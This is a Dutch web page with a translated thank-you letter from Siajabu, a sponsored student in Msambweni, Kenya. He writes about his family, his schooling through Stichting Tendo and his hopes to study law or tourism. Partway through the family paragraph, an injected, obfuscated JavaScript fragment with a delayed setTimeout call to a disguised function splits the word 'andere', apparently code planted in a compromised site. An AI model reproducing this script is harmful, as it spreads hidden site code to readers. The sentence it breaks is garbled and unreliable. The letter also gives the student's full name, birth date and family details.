Brief van Siajabu

Wij hebben van Siajabu een brief gekregen en deze hebben wij voor u vertaald.

Hallo, Mijn naam is Siajabu Bakari Lubugu en ik ben een Keniaanse inwoner van de zuidkust van Kenia, n.l. Msambweni. Ik ben geboren op 9 november 1994. Ik woon bij mijn moeder, maar ik ben opgegroeid bij mijn tante “Mama Esther”, die een lepra slachtoffer is. Mijn vader verliet ons toen ik nog niet was geboren en is gescheiden van mijn moeder. Ik heb 2 jongere zusters, Mwanamisi en Mwanaisha, maar die hebben een andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ere vader.

Nadat ik groep 8 (van de basisschool) had afgerond en goede resultaten had behaald, hadden mijn moeder en tante geen geld om me naar de middelbare school te laten gaan. Ik heb toen pastor Peter om hulp gevraagd. Ik wil pastor Peter en Stichting Tendo ontzettend bedanken voor hun sponsoring. Ik zit nu op de Saint Georges High School en ben een derdejaars student. Ik werk
erg hard en dat kan ik bewijzen door de goede resultaten die ik behaal. Mijn hobby’s zijn: lezen en basketbal en reizen. Wanneer ik mijn middelbare school opleiding heb afgerond, zou ik graag naar de universiteit willen. Ik zou dan rechten of hotel en toerisme willen studeren. Ik hou van toerisme omdat ik weet dat het een gelegenheid bied om veel vrienden te maken uit allerlei delen van de wereld en een kans om veel te reizen. Ik heb geen woorden genoeg om te bedanken voor alles wat jullie doen voor mij, want jullie geven mij hoop dat ik mijn doelen kan waarmaken. Ik werk daar ook echt hard voor. Ik ben jullie heel dankbaar voor hetgeen ik nu al bereikt heb, door jullie. Ik hoop dat jullie in de gelegenheid zijn om me te steunen totdat ik mijn doel heb bereikt.
Ik wil jullie al bij voorbaat bedanken en ik bid tot God voor een lang leven van mijn sponsoren.

Tot ziens en Gods zegen gewenst in alles wat jullie doen.

Siajabu